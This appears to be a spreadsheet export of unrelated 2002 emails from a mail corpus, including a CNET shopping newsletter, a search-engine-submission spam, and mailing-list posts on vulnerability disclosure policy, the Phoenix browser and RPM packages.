 								&amp;#149; 40X/12X/48X EIDE&lt;BR&gt;
 								&amp;#149; 1 year warranty&lt;BR&gt;
 								&amp;#149; SMART Burn&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at: &lt;font color="#CC0000"&gt;$69&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXHQfoXMxvH3QainXQ4R" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9816702_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPLWw-3dXP9VA35c54JMcR" &gt;&lt;B&gt;Pioneer DVR-A04 DVD-RW EIDE&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.7GB 2X/1X/6X DVD&lt;BR&gt;
 								&amp;#149; 8X/4X/24X CD  &lt;BR&gt;
 								&amp;#149; EIDE/ATAPI DVD-RW/CD-RW&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$289&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=60-oqItIsEAxTU6nSHLN8S_eSgFWVRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6913998_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMFv5rjH_rjups7LLZ5ZR" &gt;&lt;B&gt;HP DVD-Writer DVD100i drive&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Burn your own DVD&lt;BR&gt;
 								&amp;#149; 12x10x32x CD-RW, 2.4x8x DVD&lt;BR&gt;
 								&amp;#149; Internal EIDE &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$235&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=8a-3y3dQXndGB51noNO3Nt-tKChBwnR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8464348_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHuarVNYlcGhVIlcU_eR" &gt;&lt;B&gt;Western Digital Caviar WD1200JB 120GB&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; High Performance&lt;BR&gt;
 								&amp;#149; Ultra ATA/100 Interface &lt;BR&gt;
 								&amp;#149; 7200 RPM, 8MB buffer, OEM&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$169&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 								&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 							&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U79NnWUfl1PHq15ZNEEZPR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/3754162_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF71zrVhhcl8jfOfRHHUnR" &gt;&lt;B&gt;Iomega Predator CD-RW&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 8x/4x/32x&lt;BR&gt;
 								&amp;#149; External USB &lt;BR&gt;
 								&amp;#149; 650 MB capacity&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$67&lt;/font&gt;&lt;/B&gt;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&lt;p&gt;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ChannelOnline's StoreSite enables you 
 to set up a private storefront with your company name and 
 logo in less than an hour?
 &lt;P&gt;
 Your customers can view quotes you have created for them, 
 search the product database, build their own quotes based
 on the pricing you've predetermined for them, and place 
 orders with you online, 24/7.ross profit available to you on both quotes and 
 orders. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2X3WsDfbQq-Kh1XhaeR" &gt;Sign up now&lt;/a&gt; to give your customers a whole new level of 
 service.
  &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-wS1b-uUJ5QddfWmTyR" &gt;Tell me more about ChannelOnline.&lt;/a&gt;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href="http://clickthru.online.com/Click?q=09-joDSIj88OkFei9YLYSS7ZMgtY8lR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9bj7wnqEsB8LE27qd4R" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldqGrTj3_tvVyn4IcgyR" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4U_07NVX4RVXFO5JSFR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656yLdrRhsnStcVTQzc9R" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5r_9yOT8UEE0WNrUZcR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5Hw4hk-rU358atSBbiR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetREessuKLvd75wKZzPR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTFWwMqAjM2cmpxUCPunR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurneZ4ANWtUoF24wxeeR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0LrtqW98X1Bz6gEwTinhlyR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWuDJoOUH3XX8owMnerlR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xKw93a5map_vCgSyiL4R" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2M0po5rGQ1U5MauO37xrR" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVaYKCalyLxjkqVAXXblR"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=3b-XhvVzBdMK7EMLEu4EuRg8AlPc1GyIsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0XgZwRFlVASOnO8CtmMgRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDPtIgFj7K6D70VOf0m8P9ZR"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href="http://clickthru.online.com/Click?q=7b-prT_IBZIwRxyfTxbDr4q1O7VpJcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqhbObekVb8HYULuonXiR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTa_WhjGLsIC1b2OB8OEPR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWA-NkfxhOmI_uIUEknR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HwvKIThJaylIO7r3fxeR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjH79LjI81u0PT_Qv1yR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e446&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fa-FmbN-XO3bOwBB59F5G-GmYUJe9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FOAF explorer
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#foaf_explorer
 Date: 2002-09-25T18:18:53-05:00
 Morten Frederiksen has taken a first stab at a real-time social network 
 explorer based on FOAF files. You could start on my profile[1] and explore from 
 there, or enter the URL of your own FOAF file (at the bottom of the page). It's 
 heavy on tech details, but you can easily see the potential here. (It's also a 
 great way to debug your FOAF file, if you added anything manually.) Now we need 
 somebody to build a spider that follows foaf:knows links and draws pretty 
 social network diagrams, so we can see the forest for the trees.
 [1] http://xml.mfd-consult.dk/foaf/?foaf=http%3A%2F%2Fdiveintomark.org%2Fpublic%2Ffoaf.rdf
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: iiu.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">--1189366250.1031600041421.JavaMail.SYSTEM.emaserver2
 Content-Type: text/plain; charset=utf-8
 Content-Transfer-Encoding: 7bit
 Hi
 I visited iiu.taint.org, and noticed that you're not listed on some search engines! I think we can
 offer you a service which can help you increase traffic and the number of visitors to your website.
 I would like to introduce you to TrafficMagnet.com. We offer a unique technology that will submit your 
 website to over 300,000 search engines and directories every month.
 You'll be surprised by the low cost, and by how effective this website promotion method can be. 
 To find out more about TrafficMagnet and the cost for submitting your website to over 300,000 search 
 engines and directories, visit us at:
 http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.23.eUcT$DXPhW5$zo
 I would love to hear from you. 
 Best Regards,
 Sarah Williams
 Sales and Marketing 
 E-mail: Sarah_Williams@trafficmagnet.com
 http://www.TrafficMagnet.com
 This email was sent to zzzz-list-admin-iiu@jmason.org. 
 I understand that you may NOT wish to receive information from me by email. 
 To be removed from this and other offers, simply go to the link below:
 http://p1j2m3a4.pdhost.com/pdsvr/www/optoutredirect?UC=Lead&amp;UI=11513610
 --1189366250.1031600041421.JavaMail.SYSTEM.emaserver2
 Content-Type: text/html; charset=utf-8
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;!-- 1.0 --&gt; 
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;STYLE TYPE="text/css"&gt;
 &lt;!--
 TD { font-family: verdana, arial, helvetica; font-size: 11px; color: #000000 }
 --&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF"&gt;
 &lt;TABLE WIDTH="600" BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;
 &lt;TR&gt;
 	&lt;TD&gt;Hi&lt;BR&gt;
 	&lt;BR&gt;
 	I visited &lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.5.3LiGMlCfBL1X7s"&gt;iiu.taint.org&lt;/A&gt;, and 
 	noticed that you're not listed on some search engines! I think we can offer 
 	you a service which can help you increase traffic and the number of visitors 
 	to your website.&lt;BR&gt;
 	&lt;BR&gt;
 	I would like to introduce you to &lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.2.Wcdniklsi+C9l6"&gt;TrafficMagnet.com&lt;/A&gt;. We offer a unique technology 
 	that will submit your website to over 300,000 search engines and directories 
 	every month.&lt;BR&gt;
 	&lt;BR&gt; 
 	&lt;TABLE WIDTH="398" BORDER="0" CELLSPACING="0" CELLPADDING="0" ALIGN="center"&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;&lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.8.43CuFchAOTr0t7"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_tm.gif" WIDTH="137" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&amp;nbsp;&lt;/TD&gt;
 		&lt;TD&gt;&lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.11.5J2PcvS63vRqi$"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_website.gif" WIDTH="197" HEIGHT="141" BORDER="1"&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD VALIGN="bottom"&gt;&lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.14.dbH9rBk43Z3NzY"&gt;&lt;IMG SRC="http://www.trafficmagnet.com/img/img_signup.gif" WIDTH="62" HEIGHT="136" BORDER="0"&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/TABLE&gt;
 	&lt;BR&gt;
 	You'll be surprised by the low cost, and by how effective this website promotion 
 	method can be. &lt;BR&gt;
 	&lt;BR&gt;
 	To find out more about TrafficMagnet and the cost for submitting your website 
 	to over 300,000 search engines and directories, visit &lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.17.AsZnyxfUUm2wNl"&gt;www.TrafficMagnet.com&lt;/A&gt;. 
 	&lt;BR&gt;
 	&lt;BR&gt;
 	I would love to hear from you. &lt;BR&gt;
 	&lt;BR&gt;&lt;BR&gt;
 	Best Regards,&lt;BR&gt;&lt;BR&gt;
 	Sarah Williams&lt;BR&gt;
 	Sales and Marketing&lt;BR&gt;
 	E-mail: Sarah_Williams@trafficmagnet.com&lt;BR&gt;
 	&lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000010979.505.20.lFPUQExWtAzwnt"&gt;http://www.TrafficMagnet.com&lt;/A&gt; 
 	&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 	&lt;TD&gt;&lt;FONT COLOR="#999999"&gt;This email was sent to zzzz-list-admin-iiu@jmason.org.&lt;BR&gt;
 	I understand that you may NOT wish to receive information from me by email.&lt;BR&gt;
 	To be removed from this and other offers, simply &lt;A HREF="http://p1j2m3a4.pdhost.com/pdsvr/www/optoutredirect?UC=Lead&amp;UI=11513610"&gt;click here&lt;/A&gt;.&lt;BR&gt;&lt;/FONT&gt;
 	&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://p1j2m3a4.pdhost.com/pdsvr/www/picture.jsp?UC=Lead&amp;UI=11513610&amp;CRID=505CR1000010979" ALT="." HEIGHT=1 WIDTH=1&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --1189366250.1031600041421.JavaMail.SYSTEM.emaserver2--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: the underground software vulnerability marketplace and its
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kragen,
    This is an interesting analysis.  I think that there are a couple
 of nits I might pick (for example, I don't expect that the market will
 be well developed with highest bidders for while), I think that the
 most important issue, which is that end users won't be able to fix
 their systems, is almost passed over.  I know that you know this, and
 you allude to it, but your essay is getting passed around, so you
 might want to add to it bits about the sysadmin and others.
    There's one other point which you don't make, which I think is very
 important, which is that research into defining and addressing classes
 of vulnerabilities can't happen without libraries of available
 vulnerability code.  I can think of three researchers into automated
 methods for addressing vulnerabilities who griped, uninvited, about
 the quality of the existing vulnerability sites.  Doing research into
 a set requires that you have enough examples, in the open, that you
 can define a set, and that the set is added to from time to time so
 you can make and test predictions.
    I feel fairly confident in saying that without full disclosure, we
 wouldn't have Stackguard, ITS4, Nissus, or snort.  And the security
 admin's job would be a lot harder.
 Adam
 On Thu, Aug 22, 2002 at 08:42:12AM +0200, Eugen Leitl wrote:
 | -- 
 | -- Eugen* Leitl &lt;a href="http://leitl.org"&gt;leitl&lt;/a&gt;
 | ______________________________________________________________
 | ICBMTO: N48 04'14.8'' E11 36'41.2'' http://eugen.leitl.org
 | 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
 | 
 | 
 | ---------- Forwarded message ----------
 | Date: Thu, 22 Aug 2002 00:24:54 -0400 (EDT)
 | From: Kragen Sitaker &lt;kragen@pobox.com&gt;
 | To: fork@example.com
 | Subject: the underground software vulnerability marketplace and its hazards
 | 
 | On August 7th, an entity known as "iDEFENSE" sent out an announcement,
 | which is appended to this email.  Briefly, "iDEFENSE", which bills
 | itself as "a global security intelligence company", is offering cash
 | for information about security vulnerabilities in computer software
 | that are not publicly known, especially if you promise not to tell
 | anyone else.
 | 
 | If this kind of secret traffic is allowed to continue, it will pose a
 | very serious threat to our computer communications infrastructure.
 | 
 | At the moment, the dominant paradigm for computer security research
 | known as "full disclosure"; people who discover security
 | vulnerabilities in software tell the vendor about them, and a short
 | while later --- after the vendor has had a chance to fix the problem
 | --- they publish the information, including code to exploit the
 | vulnerability, if possible.  
 | 
 | This method has proven far superior to the old paradigm established by
 | CERT in the late 1980s, which its proponents might call "responsible
 | disclosure" --- never release working exploit code, and never release
 | any information on the vulnerability before all vendors have released
 | a patch.  This procedure often left hundreds of thousands of computers
 | vulnerable to known bugs for months or years while the vendors worked
 | on features, and often, even after the patches were released, people
 | wouldn't apply them because they didn't know how serious the problem
 | was.
 | 
 | The underground computer criminal community would often discover and
 | exploit these same holes for months or years while the "responsible
 | disclosure" process kept their victims, who had no connections in the
 | underground, vulnerable.
 | 
 | The problem with this is that vulnerabilities that are widely known
 | are much less dangerous, because their victims can take steps to
 | reduce their potential impact --- including disabling software,
 | turning off vulnerable features, filtering traffic in transit, and
 | detecting and responding to intrusions.  They are therefore much less
 | useful to would-be intruders.  Also, software companies usually see
 | security vulnerabilities in their software as PR problems, and so
 | prefer to delay publication (and the expense of fixing the bugs) as
 | long as possible.
 | 
 | iDEFENSE is offering a new alternative that appears far more dangerous
 | than either of the two previous paradigms.  They want to be a buyer in
 | a marketplace for secret software vulnerability information, rewarding
 | discoverers of vulnerabilities with cash.  
 | 
 | Not long before, Snosoft, a group of security researchers evidently
 | including some criminal elements, apparently made an offer to sell the
 | secrecy of some software vulnerability information to the software
 | vendor; specifically, they apparently made a private offer to
 | Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if
 | HP retained Snosoft's "consulting services".  HP considered this
 | extortion and responded with legal threats, and Snosoft published the
 | information.
 | 
 | If this is allowed to happen, it will cause two problems which,
 | together, add up to a catastrophe.
 | 
 | First, secret software vulnerability information will be available to
 | the highest bidder, and to nobody else.  For reasons explained later,
 | I think the highest bidders will generally be organized crime
 | syndicates, although that will not be obvious to the sellers.
 | 
 | Second, finding software vulnerabilities and keeping them secret will
 | become lucrative for many more talented people.  The result will be
 | --- just as in the "responsible disclosure" days --- that the good
 | guys will remain vulnerable for months and years, while the majority
 | of current vulnerabilities are kept secret.
 | 
 | I've heard it argued that the highest bidders will generally be the
 | vendors of the vulnerable software, but I don't think that's
 | plausible.  If someone can steal $20 000 because a software bug lets
 | them, the software vendor is never held liable; often, in fact, the
 | people who administer the software aren't liable, either --- when
 | credit card data are stolen from an e-commerce site, for example.
 | Knowing about a vulnerability before anyone else might save a web-site
 | administrator some time, and it might save the software vendor some
 | negative PR, but it can net the thief thousands of dollars.
 | 
 | I think the highest bidders will be those for whom early vulnerability
 | information is most lucrative --- the thieves who can use it to
 | execute the largest heists without getting caught.  Inevitably, that
 | means organized crime syndicates, although the particular gangs who
 | are good at networked theft may not yet exist.
 | 
 | There might be the occasional case where a market leader, such as
 | Microsoft, could make more money by giving their competitors bad PR
 | than a gang could make by theft.  Think of a remote-root hole in
 | Samba, for example.
 | 
 | Right now, people who know how to find security exploits are either
 | motivated by personal interest in the subject, motivated by the public
 | interest, motivated by a desire for individual recognition, or
 | personally know criminals that benefit from their exploits.  Creating
 | a marketplace in secret vulnerability information would vastly
 | increase the availability of that information to the people who can
 | afford to pay the most for it: spies, terrorists, and organized crime.
 | 
 | Let's not let that happen.
 | 
 | 
 | 
 | 
 | This is the original iDEFENSE announcement:
 | 
 | From: Sunil James [mailto:SJames@iDefense.com]
 | Sent: Wednesday, August 07, 2002 12:32 PM
 | Subject: Introducing iDEFENSE's Vulnerability Contributor Program
 | 
 | 
 | Greetings,
 | 
 | iDEFENSE is pleased to announce the official launch of its Vulnerability
 | Contributor Program (VCP). The VCP pays contributors for the advance
 | notification of vulnerabilities, exploit code and malicious code.
 | 
 | iDEFENSE hopes you might consider contributing to the VCP. The following
 | provides answers to some basic questions about the program:
 | 
 | Q. How will it work?
 | A. iDEFENSE understands the majority of security researchers do not publish
 | security research for compensation; rather, it could be for any of a number
 | of motivations, including the following:
 | 
 |          * Pure love of security research
 |          * The desire to protect against harm to targeted networks
 |          * The desire to urge vendors to fix their products
 |          * The publicity that often accompanies disclosure
 | 
 | The VCP is for those who want to have their research made public to the
 | Internet community, but who would also like to be paid for doing the
 | work.The compensation will depend, among other things, on the following
 | items:
 | 
 |          * The kind of information being shared (i.e. vulnerability or exploit)
 |          * The amount of detail and analysis provided
 |          * The potential severity level for the information shared
 |          * The types of applications, operating systems, and other
 |            software and hardware potentially affected
 |          * Verification by iDEFENSE Labs
 |          * The level of exclusivity, if any, for data granted to iDEFENSE
 | 
 | Q. Who should contribute to the VCP?
 | A. The VCP is open to any individual, security research group or other
 | entity.
 | 
 | Q. Why are you launching this program?
 | A. Timeliness remains a key aspect in security intelligence. Contributions
 | to some lists take time before publication to the public at large. More
 | often, many of these services charge clients for access without paying the
 | original contributor. Under the iDEFENSE program, the contributor is
 | compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the
 | public at large are warned in a timely manner.
 | 
 | Q. Who gets the credit?
 | A. The contributor is always credited for discovering the vulnerability or
 | exploit information.
 | 
 | Q. When can I contribute?
 | The VCP is active. You are welcome to begin contributing today.
 | 
 | To learn more, go to http://www.idefense.com/contributor.html. If you have
 | questions or would like to sign up as a contributor to the VCP, please
 | contact us at contributor@idefense.com.
 | 
 | Regards,
 | 
 | Sunil James
 | Technical Analyst
 | iDEFENSE
 | 
 | "iDEFENSE is a global security intelligence company that proactively
 | monitors sources throughout the world -- from technical vulnerabilities and
 | hacker profiling to the global spread of viruses and other malicious code.
 | The iALERT security intelligence service provides decision-makers, frontline
 | security professionals and network administrators with timely access to
 | actionable intelligence and decision support on cyber-related threats.
 | iDEFENSE Labs is the research wing that verifies vulnerabilities, examines
 | the behavior of exploits and other malicious code and discovers new
 | software/hardware weaknesses in a controlled lab environment."
 | 
 | http://xent.com/mailman/listinfo/fork
 | 
 -- 
 "It is seldom that liberty of any kind is lost all at once."
 					               -Hume
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Missing the Point
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85471617
 Date: Not supplied
 A lot of people seem to be missing the point of Phoenix, as evidenced by the 
 responses on Mozilla News[1] and MozillaZine[2]. Let me emphasize something 
 here: if you think Mozilla's current UI is acceptable, then you are clearly not 
 the target audience for Phoenix.
 Here is a quiz to test whether or not Phoenix is the right browser for you.
 - The link toolbar is: 
 - critical to my day-to-day use 
 - vital when using Bugzilla! Doesn't everybody use Bugzilla?
 -  link what?
 - The sidebar is 
 - indispensable since i run at 1600x1200 resolution 
 - not cool enough, since i can't float and dock all my panels and have 
 splitters between all panels and see web page progress for individual HTML 
 panels and check my email entirely from within sidebar and... 
 - a waste of real estate
 - Form auto-fill 
 - is not useful for me unless I can fill out 20 pages of personal information 
 first 
 - should just happen automatically
 - Downloads 
 - should take place in a tree view with progress meters in the columns! 
 - should be clearly visible and understandable.
 - Toolbars should 
 - be dockable to all four corners of the screen, be able to float outside the 
 window, be fully customizable such that I can make my own custom commands, be 
 able to edit existing buttons' commands, be able to create my own toolbars, be 
 able to put toolbars on the same line, and be able to edit the submenus and 
 context menus of items (including the items on the menu bar) and browse my file 
 system and cook me dinner and wash my car and walk my dog and do my taxes and 
 mow my lawn and... 
 - be customizable within reason
 - Composer should 
 - always come with my browser. I want composer options all over my UI. 
 Everywhere! 
 - not be part of a Web browser.
 - Mail should 
 - be part of my browser program. Aren't they the same app? There is a 
 difference? 
 - be a separate application.
 Now to those people who want the full-blown functionality of the Mozilla trunk, 
 you can still get that with Phoenix. The idea is to relegate more features to 
 the "optional add-on" category. If you want the link toolbar or the sidebar or 
 mouse gestures or any other features, you can download and install them 
 yourself. I expect Phoenix will have a little add-in manager that will 
 facilitate this process. There is currently an expectation on the part of an 
 alarming number of people that every feature implemented by anyone should 
 automatically be part of the default Mozilla install/download. 
 Why? 
 A layered approach scales better. You can then have a browser that can become 
 as complex as you want to make it, but the choice is left in your hands. The 
 geek features aren't inflicted on you by default.
 Finally, remember that Phoenix's UI is not controlled by Netscape. This is an 
 opportunity for some of the core Mozilla Navigator developers to build the 
 browser that they have always wanted to build, without having to compromise the 
 user interface to satisfy the various conflicting pressures exerted by factions 
 within Netscape.
 [1] http://www.mozillanews.org
 [2] http://www.mozillazine.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@rpmforge.net) wrote*:
 &gt;
 &gt;You can also install the XMMS plugin
 &gt;(seems to make my XMMS segfault on exit...
 &gt;hmmm, but maybe it's another plugin) to listen to your good ol' mp3
 &gt;files... that's it!
 I've an XMMS Alsa module I've been using for a while now at:
 http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630-aap1.i686.rpm
 http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630-aap1.src.rpm
 http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630.spec
 Also there is alsaplayer rpms there too:
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.i386.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.i686.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.src.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71.spec
 Good luck. Both were build on an RH 7.3 box with errata current as of the date of
 the build. I'm running (null) RH beta now and I recall that alsa-xmms still works, I
 can not remember if alsaplayer needs a --rebuild.
 As an aside, alsaplayer is really maturing into a versitile app, I've been packaging
 for many releases now.
 I've scripted the alsa-xmms cvs build, so it's easy to spin another one if these
 rpms do not work on (null).
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Bod wrote
 &lt;snip&gt;
 &gt; /Enter the rant.
 &gt;
 &gt; One thing that really bugs me is when people say things like.
 &gt;
 &gt; "On the machies we have these days you don't have to worry about
 &gt;  writing optimised code" or "don't worry about writing
 &gt;  things inline, just use a function"
